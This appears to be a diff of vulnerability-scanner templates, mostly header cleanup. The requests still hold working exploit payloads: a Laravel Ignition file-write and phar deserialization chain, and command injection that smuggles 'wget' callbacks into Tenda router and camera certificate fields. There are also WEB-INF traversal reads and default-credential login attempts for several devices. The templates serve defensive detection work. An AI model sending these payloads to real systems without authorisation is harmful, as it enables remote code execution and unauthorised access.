0=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
|
||||
|
@ -59,10 +47,7 @@ requests:
|
|||
- |
|
||||
POST /_ignition/execute-solution HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: deflate
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Content-Length: 144
|
||||
Content-Type: application/json
|
||||
|
||||
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
|
||||
|
@ -70,10 +55,7 @@ requests:
|
|||
- |
|
||||
POST /_ignition/execute-solution HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: deflate
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Content-Length: 144
|
||||
Content-Type: application/json
|
||||
|
||||
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
|
||||
|
|
|
@ -15,12 +15,8 @@ requests:
|
|||
- |
|
||||
POST /goform/setmac HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Origin: http://{{Hostname}}
|
||||
Referer: http://{{Hostname}}/index.htmlr
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}/index.htmlr
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
|
||||
|
|
|
@ -14,7 +14,6 @@ requests:
|
|||
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: asusrouter--
|
||||
Connection: close
|
||||
Referer: {{BaseURL}}
|
||||
Cookie: asus_token=\0Invalid; clickedItem_tab=0
|
||||
|
||||
|
|
|
@ -14,10 +14,6 @@ requests:
|
|||
- |
|
||||
GET /status.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
Cookie: language=en; login=1
|
||||
|
||||
matchers-condition: and
|
||||
|
|
|
@ -15,9 +15,6 @@ requests:
|
|||
GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cache-Control: max-age=0
|
||||
Connection: keep-alive
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -16,13 +16,11 @@ requests:
|
|||
GET /%u002e/WEB-INF/web.xml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
- |+
|
||||
GET /.%00/WEB-INF/web.xml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
|
||||
unsafe: true
|
||||
|
|
|
@ -12,13 +12,10 @@ requests:
|
|||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}
|
||||
Connection: close
|
||||
|
||||
-----------------------------138742543134772812001999326589
|
||||
Content-Disposition: form-data; name="reg_username"
|
||||
|
@ -77,13 +74,10 @@ requests:
|
|||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}
|
||||
Connection: close
|
||||
|
||||
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
|
||||
|
||||
|
|
|
@ -10,16 +10,14 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
|
||||
tags: cve,cve2021,tieline,default-login
|
||||
|
||||
# admin:password
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/api/get_device_details'
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Referer: '{{BaseURL}}/assets/base/home.html'
|
||||
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
|
||||
# admin:password
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -14,36 +14,24 @@ requests:
|
|||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"admin","password":"cs141-snmp"}
|
||||
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"engineer","password":"engineer"}
|
||||
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"guest","password":"guest"}
|
||||
|
||||
|
|
|
@ -11,15 +11,9 @@ requests:
|
|||
- |
|
||||
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Accept: text/plain, */*; q=0.01
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 67
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}/libs/granite/core/content/login.html
|
||||
Connection: close
|
||||
|
||||
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
|
||||
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue